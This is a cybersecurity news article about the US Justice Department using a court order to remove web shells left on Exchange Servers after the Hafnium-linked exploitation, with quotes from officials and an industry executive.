DoJ used court order to thwart ‘hundreds’ of Exchange Server web shells

Cyber Security News

The Department of Justice used a court order to dismantle ‘hundreds’ of web shells installed using Exchange Server vulnerabilities. (Photo by Roy Rochlin/Getty Images for Leaders)

The Department of Justice used a court order to dismantle ‘hundreds’ of web shells installed using Exchange Server vulnerabilities patched by Microsoft six weeks ago. Microsoft claimed at the time a state-sponsored group located in China it dubbed Hafnium actively exploiting the vulnerabilities at the time of the patch.

“Today’s court-authorized removal of the malicious web shells demonstrates the department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” said Assistant Attorney General for National Security John Demers in a statement.

“Combined with the private sector’s and other government agencies’ efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country’s cybersecurity.”

Microsoft, which patched two new vulnerabilities in Exchange Server Tuesday afternoon, declined a request for comment.

The department used the web shells to remove themselves, sending them commands to delete. The FBI is making an effort to alert all parties who had the shells removed by email, and is contacting internet service providers to find victims via IP address.

The DOJ states that it removed “one early hacking group’s remaining web shells,” while noting that several groups, both criminal and nation-state, have utilized the vulnerabilities. They have not claimed to remove more than that one group’s web shells and removing the web shell will not patch the underlying vulnerabilities.

The move is unprecedented, and implies a growing understanding that cyber risks should be addressed with the same urgency of other threats to national security and critical infrastructure, said Malcolm Harkins, chief security and trust officer for Cymatic.

“I applaud the approach. If you were to take it further perhaps the cost of the clean up should be billed to the folks who didn’t remove the web shell,” he said, drawing an analogy to a chemical plant owner that didn’t act quickly enough in response to a chemical spill, and to actions taken by federal authorities after the BP oil spill.

“There’s no doubt that more work remains to be done, but let there also be no doubt that the department is committed to playing its integral and necessary role in such efforts,” Demers said in the statement.

This story is evolving. Check back for updates.